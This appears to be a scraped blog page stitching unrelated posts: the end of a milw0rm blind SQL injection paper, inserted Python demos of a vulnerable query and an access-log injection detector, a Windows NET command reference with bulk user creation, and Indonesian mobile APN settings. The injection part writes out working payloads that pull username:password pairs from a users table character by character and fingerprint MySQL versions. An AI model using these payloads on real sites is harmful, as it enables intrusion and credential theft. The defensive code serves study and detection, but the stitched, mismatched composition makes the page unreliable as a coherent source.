http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far

so keep incrementing until you get to the end. (when >0 returns false we know that we have reached the end).
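The whole technique depends on the page answering differently for a true and a false condition. The following added example (not part of the original paper) shows that difference with the `and 1=1` / `and 1=2` pair from the text, and how binding the parameter removes it. It assumes news.php builds its query by string concatenation; the function names and data are constructed, and an in-memory SQLite database stands in for MySQL.

```python
import re
import sqlite3


def make_db():
    """In-memory SQLite stand-in for the site's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (5, 'Constructed headline')")
    return db


def render(rows):
    """What the visitor sees: the article, or a page with the content missing."""
    return "<h1>%s</h1>" % rows[0][0] if rows else "<h1>No article</h1>"


def page_vulnerable(db, raw_id):
    # Assumed flaw: the id parameter is concatenated into the SQL text,
    # so "5 and 1=2" becomes part of the WHERE clause.
    rows = db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()
    return render(rows)


def page_bound(db, raw_id):
    # Bound parameter: the whole string is compared as one value and is
    # never parsed as SQL.
    rows = db.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()
    return render(rows)


def page_hardened(db, raw_id):
    # Validate the type first, then bind. Every non-numeric id gets the same
    # fixed response, so nothing about the data can be inferred from it.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return "<h1>Bad request</h1>"
    rows = db.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),)).fetchall()
    return render(rows)


def has_oracle(page, db, true_probe="5 and 1=1", false_probe="5 and 1=2"):
    """True if the two probes from the text produce different pages."""
    return page(db, true_probe) != page(db, false_probe)


if __name__ == "__main__":
    db = make_db()
    for page in (page_vulnerable, page_bound, page_hardened):
        print(page.__name__, "answers true/false differently:", has_oracle(page, db))
```
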

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,

cause that makes you a better SQL INJECTOR 😀

Hope you learned something from this paper.

Have FUN! (:

To be continued and updated…

marezzi@gmail.com

[18 April 2008]

# milw0rm.com [2008-05-22]

—-

http://foo/web.php?table=38 – We get normal screen
http://foo/web.php?table=38/*%20s*/ – We get normal screen
http://foo/web.php?table=38/*!%20s*/ – We get a different screen because syntax error in comments – MySQL is in use
http://foo/web.php?table=38/*!30000%20s*/ – We get a different screen, MySQL is at least 3.x.x
http://foo/web.php?table=38/*!40000%20s*/ – We get a different screen, MySQL is at least 4.x.x
http://foo/web.php?table=38/*!50000%20s*/ – We get normal screen, MySQL is below 5.x.x
http://foo/web.php?table=38/*!40020%20s*/ – We get normal screen, MySQL is below 4.0.20
http://foo/web.php?table=38/*!40017%20s*/ – We get a different screen, MySQL is at least 4.0.17
http://foo/web.php?table=38/*!40018%20s*/ – We get normal screen, MySQL is below 4.0.18
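Seen from the server side, the requests in both parts of this paper and in the version checks above leave a recognisable trail in the access log. The following added example (not part of the original paper) URL-decodes each query string, flags the boolean, UNION/information_schema, substring-comparison and versioned-comment shapes, and counts requests that differ only in their numbers, which is what character-by-character guessing looks like. The log lines, client addresses, signature names and threshold are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Request shapes taken from the walkthrough above.
SIGNATURES = {
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "char_compare": re.compile(r"\b(?:substring|substr|mid)\s*\(.+\)\s*[=<>]", re.I),
    "version_comment": re.compile(r"/\*!\d{5}"),
}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

_EXTRACT = ("/news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)"
            "%20from%20users%20limit%200,1),1,1))%3E")


def _entry(client, target):
    """Build one constructed log line in common log format."""
    return '%s - - [22/May/2008:10:00:00 +0000] "GET %s HTTP/1.1" 200 5120' % (client, target)


# Constructed sample; the client addresses are documentation ranges.
SAMPLE_LOG = [
    _entry("192.0.2.10", "/news.php?id=5"),
    _entry("192.0.2.10", "/search.php?q=salt+and+pepper"),
    _entry("198.51.100.7", "/news.php?id=5%20and%201=1"),
    _entry("198.51.100.7", "/news.php?id=5%20and%201=2"),
] + [_entry("198.51.100.7", _EXTRACT + n) for n in ("80", "95", "98", "99")] + [
    _entry("203.0.113.5", "/web.php?table=38/*!40000%20s*/"),
    _entry("203.0.113.5", "/news.php?id=5%20union%20all%20select%201,column_name,3"
                          "%20from%20information_schema.columns%20limit%200,1/*"),
]


def parse_line(line):
    """Return (client, decoded query string), or None for unparsable lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    return client, unquote_plus(urlsplit(target).query)


def classify(query):
    """Names of the signatures that match a decoded query string."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def skeleton(query):
    """Collapse digit runs so requests differing only in numbers group together."""
    return re.sub(r"\d+", "N", query.lower())


def analyze(lines, threshold=3):
    """Per-client report: matched signatures and repeated comparison requests."""
    hits = defaultdict(set)
    repeats = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, query = parsed
        names = classify(query)
        hits[client].update(names)
        if "char_compare" in names:
            repeats[client][skeleton(query)] += 1
    report = {}
    for client, names in hits.items():
        if not names:
            continue  # client made only ordinary requests
        max_repeat = max(repeats[client].values(), default=0)
        report[client] = {
            "signatures": names,
            "max_repeat": max_repeat,
            "extraction": max_repeat >= threshold,
        }
    return report


if __name__ == "__main__":
    for client, info in analyze(SAMPLE_LOG).items():
        print(client, sorted(info["signatures"]), "extraction:", info["extraction"])
```
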

From : milw0rm

Command prompt for logg networking

•December 14, 2008 • Leave a Comment

How can I create a report of all the users and groups in my domain?
=====================================================
Note: Removal of the /domain switch will generate a report for the local machine.

NET USERS /DOMAIN >USERS.TXT

This command will return the user accounts from the Primary Domain Controller (PDC) of the current domain, and write them to a file called USERS.TXT

NET ACCOUNTS /DOMAIN >ACCOUNTS.TXT

This command will return the account policy information from the PDC of the current domain, and write it to a file called ACCOUNTS.TXT

NET CONFIG SERVER >SERVER.TXT

This command will return the server name, version of Windows, active network adapter information/MAC address, Server hidden status, Maximum Logged On Users, Maximum open files per session, Idle session time, and write it to a file called SERVER.TXT

NET CONFIG WORKSTATION >WKST.TXT

This command will return the workstation name, user name, version of Windows, network adapter, network adapter information/MAC address, Logon domain, COM Open Timeout, COM Send Count, COM Send Timeout, and write it to a file called WKST.TXT.

NET GROUP /DOMAIN >DGRP.TXT

This command will return the global groups on the PDC of the current domain, and write them to a file called DGRP.TXT.

NET LOCALGROUP >LGRP.TXT

This command will return the local groups on the local machine, and write them to a file called LGRP.TXT.

NET VIEW /DOMAIN:DOMAINNAME >VIEW.TXT

This command will return the resources in the specified domain, and write them to a file called VIEW.TXT.

Method #1: By using the NET USER command
====================================

NET USER is an old NT-related user manipulation command. I will not list all of its attributes here
(you can find for yourself by going to the Help and Support site on your computer). I do not usually use the
NET USER command in an AD environment, mostly due to the fact that it is not tailored for AD objects at all, but still, it can be used for our needs.

You can use the FOR and NET USER commands to accomplish the task in a “quick and dirty” way, without scripting or writing any code.
For example, if you type from the command prompt:
———
FOR /L %i in (1,1,500) DO NET USER MyUser%i /ADD
———
This will result in creating 500 new users, named MyUser1, MyUser2, etc. You can, of course, customize the FOR command’s parameters. See the FOR command help for more options.

You can also set the user’s password (in this case – P@ssw0rd) in the same manner:

FOR /L %i in (1,1,500) DO NET USER MyUser%i P@ssw0rd /ADD

You can delete all those users by running the following command:

FOR /L %i in (1,1,500) DO NET USER MyUser%i /DELETE

Note: If run on a stand alone W2K Server, W2K PRO or on an XP machine, this script will create local users. If run on a DC it will create users in the USERS Container in the AD. However, doing so on a domain controller will not create fully AD-compatible users (as you can clearly see if you open one of these users and try to find the User Principal Name – UPN – field).

Note: If you’re using a W2K PRO or XP PRO computer that is connected to an Active Directory network and you wish to create local users on that computer – run the command above. However, if you want, from that computer, to create users in the Active Directory database on the DC, use this command instead:

FOR /L %i in (1,1,500) DO NET USER MyUser%i P@ssw0rd /domain /ADD

To create users with pre-configured names (for example – a file with all your company’s usernames or a database with usernames) create a text file like this one:

daniel
moshe
yossy
gabi
ran
bijo
baruch
bibi

Name the file USERS.TXT and place it in a directory.

Now open a CMD in that directory and run the following command:

FOR /F %i in (users.txt) DO NET USER %i P@ssw0rd /domain /ADD

This will create user accounts with the names found in the USERS.TXT file, all with the same password – P@ssw0rd. You don’t have to use the /domain switch unless you want to.

See the NET USER or NET USERS command help for more options.

Method #2: By using the NET command DOS
====================================

The command line, or DOS, on the Windows OS is a very unique and interesting application.
We can carry out various commands in the OS by typing them at this command line.

One of the commands that can be accessed through the command line is the command for configuring
your network.
The basic command is as follows:

c:\net [additional options]

The available options:
accounts >> manages network accounts; the following can be configured with this option:
syntax : c:\net accounts option : value/variable
** force user log off how long after time expires
** minimum password age (days)
** maximum password age (days)
** minimum password length
** length of password history maintained
** lockout threshold
** lockout duration (minute)
** lockout observation window (minute)
** computer role :

computer >> adds or removes a computer in the network
syntax : c:\net computer \\client01 /add
the following values can be changed with this command:
** server name
** server comment
**

config >> sets the server or workstation configuration
syntax : c:\net config server
the following configurations are available in the config command:
** server
** workstation

continue >> this command continues a running service.
syntax : c:\net continue service

file >> this command manages file sharing in the network
syntax : c:\net file

group >> command for managing computer and domain groups through the WDC (Windows domain controller)
syntax : c:\net group

help >> this command displays the help menu for each option of the net command
syntax : c:\net help [option]

helpmsg >> this command displays help for each error message number that appears
syntax : c:\net helpmsg [message no., e.g. 2185]

localgroup >> command for configuring local groups in the network
syntax : c:\net localgroup [option]
the following options are available in localgroup:
** administrators
** backup operators
** guests
** help service groups
** network configuration operators
** power users
** remote desktop users
** replicator
** users

name >> command for managing the name aliases used by messenger,
syntax : c:\net name

pause >> command for pausing a service or resource running in the network.
syntax : c:\net pause service [service name]
examples of running service names:
** net logon
** nt lm security support provider
** schedule
** server
** workstation

print >> command for displaying the jobs running on a networked computer.
syntax : c:\net print \\client01
the options available in the print command are:
** \\computername : the name of the computer sharing the printer queue(s)
** sharename : name of the shared printer queue.
** job# : identification number assigned to a print.
** hold : prevents a job in a queue from printing.
** /release : reactivates a job that is held
** /delete : removes a job from a queue

send >> command for sending a message to another user or computer in the network.
syntax : c:\net send {name : * : /domain[name] : /users } message

session >> command for displaying the session data of each computer in the network.
syntax : c:\net session \\client01 /delete
the options for session are:
** \\computername : name of the computer whose session in the network will be printed.
** /delete : the last session that took place in the network.

share >> this command shares resources on the server so that they can be used
in the network.
syntax : c:\net share [sharename]
the options available in the net share command:
** sharename
** drive:path
** /users:number
** /unlimited
** /remark:”text”
** devicename
** /delete
** /cache:manual
** /cache:documents
** /cache:programs
** /cache:none

start >> this command displays and starts services on the server.
syntax : c:\net start “service”
the following is a list of some of the services that can be seen with net start:
** application layer gateway service
** automatic updates
** COM+ event system
** computer browser
** cryptographic services
** DHCP client
** Distributed Link Tracking Client
** DNS client
** Error reporting Services
** Event log
** Help and support
** IIS admin
** Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
** IPSEC Services
** Logical Disk manager
** Mysql
** Network Connections
** Network Location Awareness (NLA)
** Remote Procedure Call (RPC)
** Simple Mail Transfer Protocol (SMTP)
** Security Accounts Manager
** TCP/IP netBios Helper
** Telephony
** Webclient
** Wireless zero configuration
** World Wide Publishing

statistics >> this command displays the statistics log for the local network or server service.
syntax : c:\net statistics [option]
the following options are available in net statistics:
** server : displays the server statistics log
** workstation : displays the workstation statistics log

stop >> this command stops a service running in the network.
syntax : c:\net stop [service]
the following is a list of some of the services that can be stopped with the net stop command:
** alerter
** browser
** client service for netware
** clipbook
** DHCP client
** file replication
** messenger
** net logon
** NT LM security support provider
** remote access connection manager
** routing and remote access
** RPCLOCATOR
** Schedule
** server
** spooler
** TCP/IP NetBios helper service
** UPS
** workstation

time >> this command synchronizes the computer's clock with another computer or domain,
or displays the time on another computer or domain.
syntax : c:\net time [option]
the following are some of the options of net time:
** \\computername
** /domain:domainname
** /RTSdomain:domainname RTS=Reliable Time Server
** /set
** /querysntp
** /setsntp:ntp server list

use >> this command connects or disconnects a computer to or from a resource that is
shared in the network
syntax : C:\net use [option]
some of the options of the net use command:
** devicename
** \\computername
** \sharename
** \volume
** password
** /user
** domainname
** username
** /smartcard
** /savecred
** /home
** /delete
** /persistent
** yes
** no

user >> this command creates, modifies or deletes users on a workstation.
syntax : c:\net user [username[password:*][option]] [/domain]

view >> this command displays the list of resources shared in the network.
syntax : c:\net view \\computername /cache : /domain:domainname
note on the cache option : display the offline caching settings for the resources on the specified computer.

by : Ujang #10j#

at 14 Dec 08, 1:58 pm

Basic Manual Internet Settings via Mobile Phone

•December 13, 2008 • Leave a Comment

AXIS

Parameter Setting Manual GPRS

Connection Name: AXIS
Data Bearer: GPRS (Packet Data) or PS
APN: AXIS
Username: AXIS
Password: 123456
Authentication: Normal
Proxy Address: 10.8.3.8
Proxy Port: 9201 or 8080
Homepage: http://wap.axisworld.co.id
Connection Security: Off
Session Mode: Permanent

Parameter Setting Manual MMS

Connection Name: AXISmms
Data Bearer: GPRS (Packet Data) or PS
APN: AXISmms
Username: AXIS

Prompt Password: No
Password: 123456
Authentication: Normal
Proxy Address: 10.8.3.8
Proxy Port: 9201 or 8080
Homepage: http://mmsc.axisworld.co.id
Connection Security: Off
Session Mode: Permanent

3 THREE

Parameter Setting Manual GPRS 3 Three

Profil Name: 3 GPRS
APN: 3gprs
Proxy Server Address: 10.4.0.10
Proxy Port Number: 3128
Data Bearer: GPRS (Packet Data)
Username: 3gprs
Password: 3gprs
Homepage: http://wap.three.co.id

Parameter Setting Manual MMS 3 Three

Profil Name: 3 MMS
APN: 3mms
Proxy Server Address: 10.4.0.10
Proxy Port Number: 3128
Data Bearer: GPRS (Packet Data)
Username: 3mms
Password: 3mms
Homepage: http://mms.three.co.id

MENTARI

Parameter Setting Manual GPRS Mentari

Profil Name: Indosat GPRS
APN: indosatgprs
Proxy Address: 10.19.19.19
Port Proxy: 8080
Data Bearer: GPRS (Packet Data)
Username: indosat
Password: indosat
Homepage: http://wap.klub-mentari.com

Example setup on a mobile phone

Parameter Setting Manual MMS Mentari

Profil Name: Indosat MMS
APN: indosatmms
Proxy Address: 10.19.19.19
Port Proxy: 8080
Data Bearer: GPRS (Packet Data)
Username: indosat
Password: indosat
Homepage: http://mmsc.indosat.com

Example setup on a mobile phone

IM3

Parameter Setting Manual GPRS IM3

Connection Name: M3-GPRS
APN: http://www.indosat-m3.net
Username: gprs
Password: im3
Proxy Address: 10.19.19.19
Proxy Port: 9201 or 8081
Homepage: http://wap.m3-access.com

Example setup on a mobile phone

Parameter Setting Manual MMS IM3

Connection Name: M3-MMS
APN: mms.indosat-m3.net
Username: gprs
Password: im3
Proxy Address: 10.19.19.19
Proxy Port: 9201 or 8081
Homepage: http://mmsc.m3-access.com

Example setup on a mobile phone

TELKOMSEL

Parameter Setting Manual GPRS Telkomsel

Profil Name: TSEL GPRS

Data Bearer: Packet Data
APN: telkomsel
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Gateway IP Address: 10.1.89.130

Proxy Serv. Address: 8000
Homepage: http://wap.telkomsel.com
Connection Security: Off
Session Mode: Permanent

Parameter Setting Manual MMS Telkomsel

Profil Name: TSEL- MMS

Data Bearer: Packet Data
APN: telkomsel
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Gateway IP Address: 10.1.89.130

Proxy Port Number: 8000
Homepage: http://mms.telkomsel.com
Connection Security: Off
Session Mode: Permanent

XL

Parameter Setting Manual GPRS XL

Profil Name= XL GPRS
APN: http://www.xlgprs.net
Username: xlgprs
Password: proxl
Proxy Server Address: 202.152.240.50
Proxy Port: 8080
Homepage: http://wap.lifeinhand.com
Data Bearer: GPRS (Packet Data)

Parameter Setting Manual MMS XL

Profil Name= XL MMS
APN: http://www.xlmms.net
Username: xlgprs
Prompt Password: No
Password: proxl
Proxy Server Address: 202.152.240.50
Proxy Port Number: 8080
Homepage: http://mmc.xl.net.id/servlets/mms
Data Bearer: GPRS (Packet Data)
SETTING GPRS & MMS

GENERAL INSTRUCTIONS

1. Except for IM3 cards, setting up GPRS or MMS first requires an activation process.
2. Activation is done by contacting the operator of the card being used.
3. Details on how to activate can be found in the detailed GPRS settings below.
====================================================

– Setting GPRS Indosat, XL and Telkomsel –

*Setting GPRS Mentari via OTA (Over The Air) :
Type SMS: GPRS(space)PhoneBrand(space)PhoneType
Send to: 3000
Example: GPRS NOKIA 6600

*Setting GPRS Mentari Manual :
Profile Name : INDOSATGPRS
User name : indosat
Access Point Name (APN) : http://www.satelindogprs.com
Password : indosat
Gateway IP : 10.19.19.19
Homepage : http://wap.klub-mentari.com/
Data Bearer : GPRS
Proxy port number : 9201
Activate GPRS : send ACTGPRS to 888
Call Center : (021) 5438 8888 or 222 (from a mobile phone)
====================================================

*Setting GPRS Matrix via OTA :
Type SMS: GPRS(space)PhoneBrand(space)PhoneType
Send to: 3939
Example: GPRS NOKIA 6600
====================================================
*Setting GPRS MATRIX Manual :
User Name : leave blank
APN : http://www.satelindogprs.com
Password : leave blank
Gateway IP : 202.152.162.250
Homepage : http://wap.matrix-centro.com/
Data Bearer : GPRS
Proxy port number : 9201
Activate GPRS : send ACTGPRS to 888
Call Center : (021) 5438 8888 or 222 (from a mobile phone)

*Setting GPRS IM3 via OTA :
Type SMS: GPRS(space)PhoneBrand(space)PhoneType
Send to: 3939
Example: GPRS NOKIA 6600

*Setting GPRS Im3 Manual :
User name : gprs
APN : http://www.indosat-m3.net
Password : im3
Gateway IP : 010.019.019.019
Homepage : http://wap.m3-access.com/
Data Bearer : GPRS
Proxy port number : 9201 or 8080
====================================================
*Setting GPRS XL via OTA :
Type SMS: GPRS(space)PhoneBrand(space)PhoneType
Send to: 9667
Example: GPRS NOKIA 6600

*Setting GPRS XL Manual :
User name : xlgprs
APN : http://www.xlgprs.net
Password : proxl
IP Address : 202.152.240.50
Homepage : http://wap.lifeinhand.com/
Data Bearer : GPRS
Port : 9201 (standard), 8080 (proxy)
Prompt Password : No
Authentication : Normal
Phone IP address : Automatic
Primary name server : 0.0.0.0
Secondary name server : 0.0.0.0

====================================================
*Setting GPRS SIMpati and kartu AS via OTA :
Type SMS: GPRS(space)16-digit ICCID number
Send to: 6616
Example: GPRS 6210008811096665
Note: The ICCID (Integrated Circuit Card Identification) is a number made up of 16 (sixteen) digits, found on the back of your SIM card chip.

*Setting GPRS Kartu HALO via OTA :
Type SMS: GPRS
Send to: 6616
Example: GPRS

*Setting GPRS Telkomsel (semua kartu) Manual :
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Prompt Password : No
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com/
Connection Security : Off
Session Mode : Permanent
====================================================
*Setting GPRS Three
Automatically active when the starter pack is purchased. Wait a few minutes and the GPRS/MMS OTA settings will be sent directly to your phone (free). If the GPRS settings have not arrived, move your card to another GPRS-capable phone, wait a few minutes, then move it back to your phone.

*Setting MMS Telkomsel VIA OTA
– Kartu HALO:
Register at GRAPARI or
Type SMS : MMS
Send to : 6616

– Kartu SIMPATI:
Type SMS: MMS(space)16-digit card number on the back of the SIM card
Send to: 6616
Example: MMS 6210008811096665

*Setting MMS Telkomsel Manual
Connection Name : tel-MMS
Data Bearer : GPRS
Access Point Name : mms
Username : wap
Prompt Password : No
Password : wap123
Authentication : Normal
Proxy address : 10.1.89.150
Homepage : http://mms.telkomsel.com/
Connection Security : Off
====================================================

Requirements for Activating GPRS on simPATI (Telkomsel)

1. Use a phone with GPRS capability.

2. Still have a minimum credit balance of Rp. 500,-; below that amount you cannot use GPRS, MMS or SMS services.

3. Register as a GPRS subscriber, which can only be done via SMS.
How:
Type SMS : GPRS [Card Number]
Example : GPRS 6210008811096665
Send to : 6616
Note : SMS sending charge : Rp. 350 ,- / message.
The card number is the ICCID (Integrated Circuit Card Identification) number, which consists of 16 (sixteen) digits and is found on the back of your simPATI card chip. The message content is not case sensitive.
The card number must be typed without any spaces.

4. The system will send you an SMS notification after some time to inform you that the activation request is being processed : “Your request for GPRS Setup already received. Please wait for max. 48 hours for succesfull activation notification message.”

5. Activation processing takes a maximum of 48 hours.

6. Once activation has succeeded, the system will notify you via SMS from 6616 : “Welcome to GPRS Service! Your GPRS service has been activated. Please visit http://www.telkomsel.com for more information”

7. Configure the communication terminal being used with the parameters explained above

8. Be within the GPRS service area.

9. To use Telkomsel WAP with GPRS, make sure you are registered at http://www.telkomsel.com.

10. To use Telkomsel WAP with GPRS, make sure you set your handset to use the Access Point Name (APN) telkomsel.

Requirements for Activating GPRS on kartuHalo (Telkomsel)

1. Use a phone with GPRS capability.

2. Register as a GPRS subscriber; registration can be done at GraPARI, by calling 111, the toll-free service from your kartuHALO, or via SMS
How:
Type SMS : GPRS
Send to : 6616

Note : SMS sending charge : Rp. 250 ,- / message.

3. The system will send you an SMS notification after some time to inform you that the activation request is being processed : “Your request for GPRS Setup already received. Please wait for max. 48 hours for succesfull activation notification message.”

4. Activation processing takes a maximum of 48 hours.

5. Once activation has succeeded, the system will notify you via SMS from 6616 : “Welcome to GPRS Service! Your GPRS service has been activated. Please visit http://www.telkomsel.com for more information”

6. Configure the communication terminal being used with the following parameters :
User Name : wap
Prompt Password : No
Password : wap123
APN : Telkomsel
Data Bearer : GPRS
Authentication : Normal
Homepage : http://wap.telkomsel.com/
Gateway IP Address : 10.1.89.130
Port : 9201 (standard), 8000 (proxy)

7. Be within the GPRS service area.

8. To use Telkomsel WAP with GPRS, make sure you are registered at http://www.telkomsel.com.

9. To use Telkomsel WAP with GPRS, make sure you configure the settings according to the parameters explained above.

Requirements for Activating GPRS on XL
Automatic GPRS/MMS setting: send the following SMS to 9667, cost Rp. 350,- (including VAT for bebas users and excluding VAT for Xplor users).
To activate GPRS/MMS in the system, contact XL Customer Service at 818 from your bebas/Xplor number (toll-free) or 021 57959818 from other numbers (charged at the applicable rate).

====================================================
3G Activation

For Telkomsel (kartuHALO, simPATI and kartuAs)
Activation
Type SMS : 3G
Send to : 3636

Requirements :
-Use a 3G handphone.
-Use the Telkomsel network.
-Be within Telkomsel's 3G Network Coverage.
-For Mobile Video (Video Streaming & Video Download) specifically, the handset must be configured as follows :
send SMS : S(space)BRAND(space)TYPE to 5432
for example : S NOKIA N73

For INDOSAT
Activation
Type SMS : Reg(space)3G
Send to : 777

Requirements :
-Use a 3G handphone.
-Use the Indosat network.
-Be within Indosat's 3G Network Coverage

====================================================
Setting Axis

GPRS, 3G/HSDPA

1. Access point name (APN) : axis
2. User name : axis
3. Password : 123456
4. Phone IP Address : Automatic
5. Proxy Server Address : 10.8.3.8 or 10.8.1.8
6. Proxy port number : 8080 or 9201
7. Home : wap.axisworld.co.id

MMS

1. Access point name : axismms
2. User name : axis
3. Prompt Password : No
4. Password : 123456
5. Authentication : Normal
6. Gateway IP address : 0.0.0.0
7. Proxy server address : 10.8.3.8 or 10.8.1.8
8. Proxy port number : 8080 or 9201
9. Homepage : mmsc.axis

====================================================

Ujang, 11:04 am (w2 – warung wifi)#10j#